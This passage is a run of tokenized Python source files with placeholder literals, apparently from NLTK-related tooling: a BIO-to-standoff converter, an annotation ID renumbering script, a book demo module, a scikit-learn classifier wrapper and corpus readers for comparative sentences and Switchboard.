] <EOL> if re . match ( r'<STR_LIT>' , BIOline ) : <EOL> bi += <NUM_LIT:1> <EOL> else : <EOL> fields = BIOline . split ( '<STR_LIT:\t>' ) <EOL> try : <EOL> tokentext = fields [ tokenidx ] <EOL> except : <EOL> print >> sys . stderr , "<STR_LIT>" "<STR_LIT>" % ( tokenidx , BIOline ) <EOL> raise <EOL> try : <EOL> tag = fields [ tagidx ] <EOL> except : <EOL> print >> sys . stderr , "<STR_LIT>" "<STR_LIT>" % ( tagidx , BIOline ) <EOL> raise <EOL> m = re . match ( r'<STR_LIT>' , tag ) <EOL> assert m , "<STR_LIT>" % tag <EOL> ttag , ttype = m . 
groups ( ) <EOL> if len ( ttype ) > <NUM_LIT:0> and ttype [ <NUM_LIT:0> ] == "<STR_LIT:->" : <EOL> ttype = ttype [ <NUM_LIT:1> : ] <EOL> assert ( ( ttype == "<STR_LIT>" and ttag == "<STR_LIT:O>" ) or <EOL> ( ttype != "<STR_LIT>" and ttag in ( "<STR_LIT:B>" , "<STR_LIT:I>" ) ) ) , "<STR_LIT>" % tag <EOL> while ri < len ( reftext ) and reftext [ ri ] . isspace ( ) : <EOL> ri += <NUM_LIT:1> <EOL> assert reftext [ ri : ri + len ( tokentext ) ] == tokentext , "<STR_LIT>" % ( reftext [ ri : ri + len ( tokentext ) ] . encode ( "<STR_LIT>" ) , <EOL> tokentext . encode ( "<STR_LIT>" ) ) <EOL> taggedTokens . append ( ( ri , ri + len ( tokentext ) , ttag , ttype ) ) <EOL> ri += len ( tokentext ) <EOL> bi += <NUM_LIT:1> <EOL> while ri < len ( reftext ) and reftext [ ri ] . isspace ( ) : <EOL> ri += <NUM_LIT:1> <EOL> if ( len ( [ c for c in reftext [ ri : ] if not c . isspace ( ) ] ) != <NUM_LIT:0> or <EOL> len ( [ c for c in BIOlines [ bi : ] if not re . match ( r'<STR_LIT>' , c ) ] ) != <NUM_LIT:0> ) : <EOL> assert False , "<STR_LIT>" "<STR_LIT>" % ( reftext [ ri : ] , BIOlines [ bi : ] ) <EOL> standoff_entities = [ ] <EOL> revisedTagged = [ ] <EOL> prevTag = None <EOL> for startoff , endoff , ttag , ttype in taggedTokens : <EOL> if prevTag == "<STR_LIT:O>" and ttag == "<STR_LIT:I>" : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> ttag = "<STR_LIT:B>" <EOL> revisedTagged . append ( ( startoff , endoff , ttag , ttype ) ) <EOL> prevTag = ttag <EOL> taggedTokens = revisedTagged <EOL> revisedTagged = [ ] <EOL> prevTag , prevType = None , None <EOL> for startoff , endoff , ttag , ttype in taggedTokens : <EOL> if prevTag in ( "<STR_LIT:B>" , "<STR_LIT:I>" ) and ttag == "<STR_LIT:I>" and prevType != ttype : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> ttag = "<STR_LIT:B>" <EOL> revisedTagged . 
append ( ( startoff , endoff , ttag , ttype ) ) <EOL> prevTag , prevType = ttag , ttype <EOL> taggedTokens = revisedTagged <EOL> prevTag , prevEnd = "<STR_LIT:O>" , <NUM_LIT:0> <EOL> currType , currStart = None , None <EOL> for startoff , endoff , ttag , ttype in taggedTokens : <EOL> if prevTag != "<STR_LIT:O>" and ttag != "<STR_LIT:I>" : <EOL> assert currType is not None and currStart is not None , "<STR_LIT>" % fn <EOL> standoff_entities . append ( taggedEntity ( currStart , prevEnd , currType , <EOL> next_free_id_idx , reftext ) ) <EOL> next_free_id_idx += <NUM_LIT:1> <EOL> currType , currStart = None , None <EOL> elif prevTag != "<STR_LIT:O>" : <EOL> assert ttag == "<STR_LIT:I>" , "<STR_LIT>" % fn <EOL> assert currType == ttype , "<STR_LIT>" "<STR_LIT>" % ( currType , ttype ) <EOL> if ttag == "<STR_LIT:B>" : <EOL> currType , currStart = ttype , startoff <EOL> prevTag , prevEnd = ttag , endoff <EOL> if prevTag != "<STR_LIT:O>" : <EOL> standoff_entities . append ( taggedEntity ( currStart , prevEnd , currType , <EOL> next_free_id_idx , reftext ) ) <EOL> next_free_id_idx += <NUM_LIT:1> <EOL> for e in standoff_entities : <EOL> e . check ( ) <EOL> return standoff_entities <EOL> RANGE_RE = re . compile ( r'<STR_LIT>' ) <EOL> def parse_indices ( idxstr ) : <EOL> indices = [ ] <EOL> for i in idxstr . split ( '<STR_LIT:U+002C>' ) : <EOL> if not RANGE_RE . match ( i ) : <EOL> indices . append ( int ( i ) ) <EOL> else : <EOL> start , end = RANGE_RE . match ( i ) . groups ( ) <EOL> for j in range ( int ( start ) , int ( end ) ) : <EOL> indices . append ( j ) <EOL> return indices <EOL> def main ( argv ) : <EOL> if len ( argv ) < <NUM_LIT:3> or len ( argv ) > <NUM_LIT:5> : <EOL> print >> sys . 
stderr , "<STR_LIT>" , argv [ <NUM_LIT:0> ] , "<STR_LIT>" <EOL> return <NUM_LIT:1> <EOL> textfn , biofn = argv [ <NUM_LIT:1> ] , argv [ <NUM_LIT:2> ] <EOL> tokenIdx = None <EOL> if len ( argv ) >= <NUM_LIT:4> : <EOL> tokenIdx = int ( argv [ <NUM_LIT:3> ] ) <EOL> bioIdx = None <EOL> if len ( argv ) >= <NUM_LIT:5> : <EOL> bioIdx = argv [ <NUM_LIT:4> ] <EOL> with open ( textfn , '<STR_LIT>' ) as textf : <EOL> text = textf . read ( ) <EOL> with open ( biofn , '<STR_LIT>' ) as biof : <EOL> bio = biof . read ( ) <EOL> if tokenIdx is None : <EOL> so = BIO_to_standoff ( bio , text ) <EOL> elif bioIdx is None : <EOL> so = BIO_to_standoff ( bio , text , tokenIdx ) <EOL> else : <EOL> try : <EOL> indices = parse_indices ( bioIdx ) <EOL> except : <EOL> print >> sys . stderr , '<STR_LIT>' % bioIdx <EOL> return <NUM_LIT:1> <EOL> so = [ ] <EOL> for i in indices : <EOL> so . extend ( BIO_to_standoff ( bio , text , tokenIdx , i ) ) <EOL> for s in so : <EOL> print s <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s> from __future__ import with_statement <EOL> import sys <EOL> import re <EOL> DEBUG = True <EOL> class Annotation ( object ) : <EOL> def __init__ ( self , id_ , type_ ) : <EOL> self . id_ = id_ <EOL> self . type_ = type_ <EOL> def map_ids ( self , idmap ) : <EOL> self . id_ = idmap [ self . id_ ] <EOL> class Textbound ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , offsets , text ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . offsets = offsets <EOL> self . text = text <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , <EOL> '<STR_LIT:U+0020>' . join ( self . offsets ) , self . text ) <EOL> class ArgAnnotation ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , args ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . args = args <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> mapped = [ ] <EOL> for arg in self . args : <EOL> key , value = arg . split ( '<STR_LIT::>' ) <EOL> value = idmap [ value ] <EOL> mapped . append ( "<STR_LIT>" % ( key , value ) ) <EOL> self . args = mapped <EOL> class Relation ( ArgAnnotation ) : <EOL> def __init__ ( self , id_ , type_ , args ) : <EOL> ArgAnnotation . __init__ ( self , id_ , type_ , args ) <EOL> def map_ids ( self , idmap ) : <EOL> ArgAnnotation . map_ids ( self , idmap ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , '<STR_LIT:U+0020>' . join ( self . args ) ) <EOL> class Event ( ArgAnnotation ) : <EOL> def __init__ ( self , id_ , type_ , trigger , args ) : <EOL> ArgAnnotation . __init__ ( self , id_ , type_ , args ) <EOL> self . trigger = trigger <EOL> def map_ids ( self , idmap ) : <EOL> ArgAnnotation . map_ids ( self , idmap ) <EOL> self . trigger = idmap [ self . trigger ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , self . 
trigger , <EOL> '<STR_LIT:U+0020>' . join ( self . args ) ) <EOL> class Attribute ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , target , value ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . target = target <EOL> self . value = value <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> self . target = idmap [ self . target ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , self . target , <EOL> '<STR_LIT>' if self . value is None else '<STR_LIT:U+0020>' + self . value ) <EOL> class Normalization ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , target , ref , reftext ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . target = target <EOL> self . ref = ref <EOL> self . reftext = reftext <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> self . target = idmap [ self . target ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , self . target , <EOL> self . ref , self . reftext ) <EOL> class Equiv ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , targets ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . targets = targets <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> self . targets = [ idmap [ target ] for target in self . targets ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , '<STR_LIT:U+0020>' . join ( self . targets ) ) <EOL> class Note ( Annotation ) : <EOL> def __init__ ( self , id_ , type_ , target , text ) : <EOL> Annotation . __init__ ( self , id_ , type_ ) <EOL> self . target = target <EOL> self . text = text <EOL> def map_ids ( self , idmap ) : <EOL> Annotation . map_ids ( self , idmap ) <EOL> self . target = idmap [ self . target ] <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . id_ , self . type_ , self . target , self . 
text ) <EOL> def parse_textbound ( fields ) : <EOL> id_ , type_offsets , text = fields <EOL> type_offsets = type_offsets . split ( '<STR_LIT:U+0020>' ) <EOL> type_ , offsets = type_offsets [ <NUM_LIT:0> ] , type_offsets [ <NUM_LIT:1> : ] <EOL> return Textbound ( id_ , type_ , offsets , text ) <EOL> def parse_relation ( fields ) : <EOL> id_ , type_args = fields <EOL> type_args = type_args . split ( '<STR_LIT:U+0020>' ) <EOL> type_ , args = type_args [ <NUM_LIT:0> ] , type_args [ <NUM_LIT:1> : ] <EOL> return Relation ( id_ , type_ , args ) <EOL> def parse_event ( fields ) : <EOL> id_ , type_trigger_args = fields <EOL> type_trigger_args = type_trigger_args . split ( '<STR_LIT:U+0020>' ) <EOL> type_trigger , args = type_trigger_args [ <NUM_LIT:0> ] , type_trigger_args [ <NUM_LIT:1> : ] <EOL> type_ , trigger = type_trigger . split ( '<STR_LIT::>' ) <EOL> args = [ a for a in args if a ] <EOL> return Event ( id_ , type_ , trigger , args ) <EOL> def parse_attribute ( fields ) : <EOL> id_ , type_target_value = fields <EOL> type_target_value = type_target_value . split ( '<STR_LIT:U+0020>' ) <EOL> if len ( type_target_value ) == <NUM_LIT:3> : <EOL> type_ , target , value = type_target_value <EOL> else : <EOL> type_ , target = type_target_value <EOL> value = None <EOL> return Attribute ( id_ , type_ , target , value ) <EOL> def parse_normalization ( fields ) : <EOL> id_ , type_target_ref , reftext = fields <EOL> type_ , target , ref = type_target_ref . split ( '<STR_LIT:U+0020>' ) <EOL> return Normalization ( id_ , type_ , target , ref , reftext ) <EOL> def parse_note ( fields ) : <EOL> id_ , type_target , text = fields <EOL> type_ , target = type_target . split ( '<STR_LIT:U+0020>' ) <EOL> return Note ( id_ , type_ , target , text ) <EOL> def parse_equiv ( fields ) : <EOL> id_ , type_targets = fields <EOL> type_targets = type_targets . 
split ( '<STR_LIT:U+0020>' ) <EOL> type_ , targets = type_targets [ <NUM_LIT:0> ] , type_targets [ <NUM_LIT:1> : ] <EOL> return Equiv ( id_ , type_ , targets ) <EOL> parse_func = { <EOL> '<STR_LIT:T>' : parse_textbound , <EOL> '<STR_LIT:R>' : parse_relation , <EOL> '<STR_LIT:E>' : parse_event , <EOL> '<STR_LIT:N>' : parse_normalization , <EOL> '<STR_LIT:M>' : parse_attribute , <EOL> '<STR_LIT:A>' : parse_attribute , <EOL> '<STR_LIT:#>' : parse_note , <EOL> '<STR_LIT:*>' : parse_equiv , <EOL> } <EOL> def parse ( l , ln ) : <EOL> assert len ( l ) and l [ <NUM_LIT:0> ] in parse_func , "<STR_LIT>" % ( ln , l ) <EOL> try : <EOL> return parse_func [ l [ <NUM_LIT:0> ] ] ( l . split ( '<STR_LIT:\t>' ) ) <EOL> except Exception : <EOL> assert False , "<STR_LIT>" % ( ln , l ) <EOL> def process ( fn ) : <EOL> idmap = { } <EOL> with open ( fn , "<STR_LIT>" ) as f : <EOL> lines = [ l . rstrip ( '<STR_LIT:\n>' ) for l in f . readlines ( ) ] <EOL> annotations = [ ] <EOL> for i , l in enumerate ( lines ) : <EOL> annotations . append ( parse ( l , i + <NUM_LIT:1> ) ) <EOL> if DEBUG : <EOL> for i , a in enumerate ( annotations ) : <EOL> assert lines [ i ] == str ( a ) , ( "<STR_LIT>" + <EOL> '<STR_LIT>' % lines [ i ] + "<STR_LIT>" + <EOL> '<STR_LIT>' % str ( a ) ) <EOL> idmap = { } <EOL> next_free = { } <EOL> idmap [ '<STR_LIT:*>' ] = '<STR_LIT:*>' <EOL> for i , a in enumerate ( annotations ) : <EOL> if a . id_ == '<STR_LIT:*>' : <EOL> continue <EOL> assert a . id_ not in idmap , "<STR_LIT>" % ( i , l ) <EOL> prefix = a . id_ [ <NUM_LIT:0> ] <EOL> seq = next_free . get ( prefix , <NUM_LIT:1> ) <EOL> idmap [ a . id_ ] = prefix + str ( seq ) <EOL> next_free [ prefix ] = seq + <NUM_LIT:1> <EOL> for i , a in enumerate ( annotations ) : <EOL> a . map_ids ( idmap ) <EOL> print ( a ) <EOL> def main ( argv ) : <EOL> if len ( argv ) < <NUM_LIT:2> : <EOL> print >> sys . 
stderr , "<STR_LIT>" , argv [ <NUM_LIT:0> ] , "<STR_LIT>" <EOL> return <NUM_LIT:1> <EOL> for fn in argv [ <NUM_LIT:1> : ] : <EOL> process ( fn ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( sys . argv ) ) </s>
<s>
# Interactive "nltk.book"-style demo module: importing it prints a banner and
# eagerly builds nine corpus-backed Text objects (text1..text9) plus nine
# example sentences (sent1..sent9) as module-level names.
from __future__ import print_function
from nltk.corpus import (gutenberg, genesis, inaugural,
                         nps_chat, webtext, treebank, wordnet)
from nltk.text import Text
# NOTE(review): FreqDist and wordnet are not referenced in this chunk;
# presumably re-exported for interactive sessions -- confirm before removing.
from nltk.probability import FreqDist

# Banner printed as an import-time side effect.
print("<STR_LIT>")
print("<STR_LIT>")
print("<STR_LIT>")
print("<STR_LIT>")

# Each textN is constructed from a corpus and announced on stdout.
text1 = Text(gutenberg.words('<STR_LIT>'))
print("<STR_LIT>", text1.name)
text2 = Text(gutenberg.words('<STR_LIT>'))
print("<STR_LIT>", text2.name)
text3 = Text(genesis.words('<STR_LIT>'), name="<STR_LIT>")
print("<STR_LIT>", text3.name)
text4 = Text(inaugural.words(), name="<STR_LIT>")
print("<STR_LIT>", text4.name)
text5 = Text(nps_chat.words(), name="<STR_LIT>")
print("<STR_LIT>", text5.name)
text6 = Text(webtext.words('<STR_LIT>'),
             name="<STR_LIT>")
print("<STR_LIT>", text6.name)
text7 = Text(treebank.words(), name="<STR_LIT>")
print("<STR_LIT>", text7.name)
text8 = Text(webtext.words('<STR_LIT>'), name="<STR_LIT>")
print("<STR_LIT>", text8.name)
text9 = Text(gutenberg.words('<STR_LIT>'))
print("<STR_LIT>", text9.name)


def texts():
    """Print the name of every loaded Text object, one per line."""
    print("<STR_LIT>", text1.name)
    print("<STR_LIT>", text2.name)
    print("<STR_LIT>", text3.name)
    print("<STR_LIT>", text4.name)
    print("<STR_LIT>", text5.name)
    print("<STR_LIT>", text6.name)
    print("<STR_LIT>", text7.name)
    print("<STR_LIT>", text8.name)
    print("<STR_LIT>", text9.name)


# Example sentences, one corresponding to each of the nine texts above,
# given as pre-tokenized word lists.
sent1 = ["<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT:.>"]
sent2 = ["<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
         "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT:.>"]
sent3 = ["<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
         "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT:.>"]
sent4 = ["<STR_LIT>", "<STR_LIT:->", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
         "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT::>"]
sent5 = ["<STR_LIT:I>", "<STR_LIT>", "<STR_LIT:a>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
         "<STR_LIT>", "<STR_LIT>", "<STR_LIT:to>", "<STR_LIT>", "<STR_LIT>"]
sent6 = ['<STR_LIT>', '<STR_LIT:1>', '<STR_LIT::>', '<STR_LIT:[>', '<STR_LIT>', '<STR_LIT:]>', '<STR_LIT:[>', '<STR_LIT>', '<STR_LIT>',
         '<STR_LIT>', '<STR_LIT:]>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT::>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT:!>']
sent7 = ["<STR_LIT>", "<STR_LIT>", "<STR_LIT:U+002C>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT:U+002C>",
         "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT:a>", "<STR_LIT>",
         "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT:.>"]
sent8 = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT:U+002C>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
         '<STR_LIT>', '<STR_LIT>', '<STR_LIT:U+002C>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT:.>']
sent9 = ["<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
         "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT:U+002C>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>",
         "<STR_LIT>", "<STR_LIT>", "<STR_LIT:a>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT:.>"]
def sents():
    """Print each example sentence (sent1..sent9), space-joined, one per line."""
    print("<STR_LIT>", "<STR_LIT:U+0020>".join(sent1))
    print("<STR_LIT>", "<STR_LIT:U+0020>".join(sent2))
    print("<STR_LIT>", "<STR_LIT:U+0020>".join(sent3))
    print("<STR_LIT>", "<STR_LIT:U+0020>".join(sent4))
    print("<STR_LIT>", "<STR_LIT:U+0020>".join(sent5))
    print("<STR_LIT>", "<STR_LIT:U+0020>".join(sent6))
    print("<STR_LIT>", "<STR_LIT:U+0020>".join(sent7))
    print("<STR_LIT>", "<STR_LIT:U+0020>".join(sent8))
    print("<STR_LIT>", "<STR_LIT:U+0020>".join(sent9))
</s>
<s>
"""<STR_LIT>"""
from __future__ import print_function, unicode_literals

from nltk.classify.api import ClassifierI
from nltk.probability import DictionaryProbDist
from nltk import compat
try:
    from sklearn.feature_extraction import DictVectorizer
    from sklearn.preprocessing import LabelEncoder
except ImportError:
    # sklearn is optional; import errors surface later via setup_module /
    # NameError when the wrapper is actually instantiated.
    pass

__all__ = ['<STR_LIT>']


@compat.python_2_unicode_compatible
class SklearnClassifier(ClassifierI):
    """<STR_LIT>"""

    def __init__(self, estimator, dtype=float, sparse=True):
        """<STR_LIT>"""
        # The wrapped scikit-learn estimator plus the two adapters that map
        # NLTK featuresets/labels to sklearn matrices/integer classes.
        self._clf = estimator
        self._encoder = LabelEncoder()
        self._vectorizer = DictVectorizer(dtype=dtype, sparse=sparse)

    def __repr__(self):
        return "<STR_LIT>" % self._clf

    def classify_many(self, featuresets):
        """<STR_LIT>"""
        # Vectorize, predict integer class ids, then map back to labels.
        X = self._vectorizer.transform(featuresets)
        classes = self._encoder.classes_
        return [classes[i] for i in self._clf.predict(X)]

    def prob_classify_many(self, featuresets):
        """<STR_LIT>"""
        # NOTE(review): requires the wrapped estimator to implement
        # predict_proba -- not every sklearn estimator does.
        X = self._vectorizer.transform(featuresets)
        y_proba_list = self._clf.predict_proba(X)
        return [self._make_probdist(y_proba) for y_proba in y_proba_list]

    def labels(self):
        """<STR_LIT>"""
        return list(self._encoder.classes_)

    def train(self, labeled_featuresets):
        """<STR_LIT>"""
        # Split (featureset, label) pairs into parallel sequences, fit the
        # vectorizer/encoder on them, then fit the underlying estimator.
        X, y = list(compat.izip(*labeled_featuresets))
        X = self._vectorizer.fit_transform(X)
        y = self._encoder.fit_transform(y)
        self._clf.fit(X, y)
        return self

    def _make_probdist(self, y_proba):
        # Convert one row of class probabilities into an NLTK prob dist
        # keyed by the original labels.
        classes = self._encoder.classes_
        return DictionaryProbDist(dict((classes[i], p)
                                       for i, p in enumerate(y_proba)))


def setup_module(module):
    # Nose hook: skip this module's tests when sklearn is unavailable.
    from nose import SkipTest
    try:
        import sklearn
    except ImportError:
        raise SkipTest("<STR_LIT>")


if __name__ == "<STR_LIT:__main__>":
    # Demo: run the names-gender demo with two sklearn estimators.
    from nltk.classify.util import names_demo, names_demo_features
    from sklearn.linear_model import LogisticRegression
    from sklearn.naive_bayes import BernoulliNB
    print("<STR_LIT>")
    names_demo(SklearnClassifier(BernoulliNB(binarize=False)).train,
               features=names_demo_features)
    print("<STR_LIT>")
    names_demo(SklearnClassifier(LogisticRegression(C=<NUM_LIT:1000>)).train,
               features=names_demo_features)
</s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from nltk . corpus . reader . api import * <EOL> from nltk . tokenize import * <EOL> STARS = re . compile ( r'<STR_LIT>' ) <EOL> COMPARISON = re . compile ( r'<STR_LIT>' ) <EOL> CLOSE_COMPARISON = re . compile ( r'<STR_LIT>' ) <EOL> GRAD_COMPARISON = re . compile ( r'<STR_LIT>' ) <EOL> NON_GRAD_COMPARISON = re . compile ( r'<STR_LIT>' ) <EOL> ENTITIES_FEATS = re . compile ( r"<STR_LIT>" ) <EOL> KEYWORD = re . compile ( r'<STR_LIT>' ) <EOL> class Comparison ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , text = None , comp_type = None , entity_1 = None , entity_2 = None , <EOL> feature = None , keyword = None ) : <EOL> """<STR_LIT>""" <EOL> self . text = text <EOL> self . comp_type = comp_type <EOL> self . entity_1 = entity_1 <EOL> self . entity_2 = entity_2 <EOL> self . feature = feature <EOL> self . keyword = keyword <EOL> def __repr__ ( self ) : <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( self . text , self . comp_type , <EOL> self . entity_1 , self . entity_2 , self . feature , self . keyword ) <EOL> class ComparativeSentencesCorpusReader ( CorpusReader ) : <EOL> """<STR_LIT>""" <EOL> CorpusView = StreamBackedCorpusView <EOL> def __init__ ( self , root , fileids , word_tokenizer = WhitespaceTokenizer ( ) , <EOL> sent_tokenizer = None , encoding = '<STR_LIT:utf8>' ) : <EOL> """<STR_LIT>""" <EOL> CorpusReader . __init__ ( self , root , fileids , encoding ) <EOL> self . _word_tokenizer = word_tokenizer <EOL> self . _sent_tokenizer = sent_tokenizer <EOL> def comparisons ( self , fileids = None ) : <EOL> """<STR_LIT>""" <EOL> if fileids is None : <EOL> fileids = self . _fileids <EOL> elif isinstance ( fileids , compat . string_types ) : <EOL> fileids = [ fileids ] <EOL> return concat ( [ self . CorpusView ( path , self . _read_comparison_block , encoding = enc ) <EOL> for ( path , enc , fileid ) in self . 
abspaths ( fileids , True , True ) ] ) <EOL> def keywords ( self , fileids = None ) : <EOL> """<STR_LIT>""" <EOL> all_keywords = concat ( [ self . CorpusView ( path , self . _read_keyword_block , encoding = enc ) <EOL> for ( path , enc , fileid ) <EOL> in self . abspaths ( fileids , True , True ) ] ) <EOL> keywords_set = set ( [ keyword . lower ( ) for keyword in all_keywords if keyword ] ) <EOL> return keywords_set <EOL> def keywords_readme ( self ) : <EOL> """<STR_LIT>""" <EOL> keywords = [ ] <EOL> raw_text = self . open ( "<STR_LIT>" ) . read ( ) <EOL> for line in raw_text . split ( "<STR_LIT:\n>" ) : <EOL> if not line or line . startswith ( "<STR_LIT>" ) : <EOL> continue <EOL> keywords . append ( line . strip ( ) ) <EOL> return keywords <EOL> def raw ( self , fileids = None ) : <EOL> """<STR_LIT>""" <EOL> if fileids is None : <EOL> fileids = self . _fileids <EOL> elif isinstance ( fileids , string_types ) : <EOL> fileids = [ fileids ] <EOL> return concat ( [ self . open ( f ) . read ( ) for f in fileids ] ) <EOL> def readme ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . open ( "<STR_LIT>" ) . read ( ) <EOL> def sents ( self , fileids = None ) : <EOL> """<STR_LIT>""" <EOL> return concat ( [ self . CorpusView ( path , self . _read_sent_block , encoding = enc ) <EOL> for ( path , enc , fileid ) in self . abspaths ( fileids , True , True ) ] ) <EOL> def words ( self , fileids = None ) : <EOL> """<STR_LIT>""" <EOL> return concat ( [ self . CorpusView ( path , self . _read_word_block , encoding = enc ) <EOL> for ( path , enc , fileid ) <EOL> in self . abspaths ( fileids , True , True ) ] ) <EOL> def _read_comparison_block ( self , stream ) : <EOL> while True : <EOL> line = stream . readline ( ) <EOL> if not line : <EOL> return [ ] <EOL> comparison_tags = re . findall ( COMPARISON , line ) <EOL> if comparison_tags : <EOL> grad_comparisons = re . findall ( GRAD_COMPARISON , line ) <EOL> non_grad_comparisons = re . 
findall ( NON_GRAD_COMPARISON , line ) <EOL> comparison_text = stream . readline ( ) . strip ( ) <EOL> if self . _word_tokenizer : <EOL> comparison_text = self . _word_tokenizer . tokenize ( comparison_text ) <EOL> stream . readline ( ) <EOL> comparison_bundle = [ ] <EOL> if grad_comparisons : <EOL> for comp in grad_comparisons : <EOL> comp_type = int ( re . match ( r'<STR_LIT>' , comp ) . group ( <NUM_LIT:1> ) ) <EOL> comparison = Comparison ( text = comparison_text , comp_type = comp_type ) <EOL> line = stream . readline ( ) <EOL> entities_feats = ENTITIES_FEATS . findall ( line ) <EOL> if entities_feats : <EOL> for ( code , entity_feat ) in entities_feats : <EOL> if code == '<STR_LIT:1>' : <EOL> comparison . entity_1 = entity_feat . strip ( ) <EOL> elif code == '<STR_LIT:2>' : <EOL> comparison . entity_2 = entity_feat . strip ( ) <EOL> elif code == '<STR_LIT:3>' : <EOL> comparison . feature = entity_feat . strip ( ) <EOL> keyword = KEYWORD . findall ( line ) <EOL> if keyword : <EOL> comparison . keyword = keyword [ <NUM_LIT:0> ] <EOL> comparison_bundle . append ( comparison ) <EOL> if non_grad_comparisons : <EOL> for comp in non_grad_comparisons : <EOL> comp_type = int ( re . match ( r'<STR_LIT>' , comp ) . group ( <NUM_LIT:1> ) ) <EOL> comparison = Comparison ( text = comparison_text , comp_type = comp_type ) <EOL> comparison_bundle . append ( comparison ) <EOL> return comparison_bundle <EOL> def _read_keyword_block ( self , stream ) : <EOL> keywords = [ ] <EOL> for comparison in self . _read_comparison_block ( stream ) : <EOL> keywords . append ( comparison . keyword ) <EOL> return keywords <EOL> def _read_sent_block ( self , stream ) : <EOL> while True : <EOL> line = stream . readline ( ) <EOL> if re . match ( STARS , line ) : <EOL> while True : <EOL> line = stream . readline ( ) <EOL> if re . match ( STARS , line ) : <EOL> break <EOL> continue <EOL> if not re . findall ( COMPARISON , line ) and not ENTITIES_FEATS . findall ( line ) and not re . 
findall ( CLOSE_COMPARISON , line ) : <EOL> if self . _sent_tokenizer : <EOL> return [ self . _word_tokenizer . tokenize ( sent ) <EOL> for sent in self . _sent_tokenizer . tokenize ( line ) ] <EOL> else : <EOL> return [ self . _word_tokenizer . tokenize ( line ) ] <EOL> def _read_word_block ( self , stream ) : <EOL> words = [ ] <EOL> for sent in self . _read_sent_block ( stream ) : <EOL> words . extend ( sent ) <EOL> return words </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from nltk . tag import str2tuple , map_tag <EOL> from nltk import compat <EOL> from nltk . corpus . reader . util import * <EOL> from nltk . corpus . reader . api import * <EOL> @ compat . python_2_unicode_compatible <EOL> class SwitchboardTurn ( list ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , words , speaker , id ) : <EOL> list . __init__ ( self , words ) <EOL> self . speaker = speaker <EOL> self . id = int ( id ) <EOL> def __repr__ ( self ) : <EOL> if len ( self ) == <NUM_LIT:0> : <EOL> text = '<STR_LIT>' <EOL> elif isinstance ( self [ <NUM_LIT:0> ] , tuple ) : <EOL> text = '<STR_LIT:U+0020>' . join ( '<STR_LIT>' % w for w in self ) <EOL> else : <EOL> text = '<STR_LIT:U+0020>' . join ( self ) <EOL> return '<STR_LIT>' % ( self . speaker , self . id , text ) <EOL> class SwitchboardCorpusReader ( CorpusReader ) : <EOL> _FILES = [ '<STR_LIT>' ] <EOL> def __init__ ( self , root , tagset = None ) : <EOL> CorpusReader . __init__ 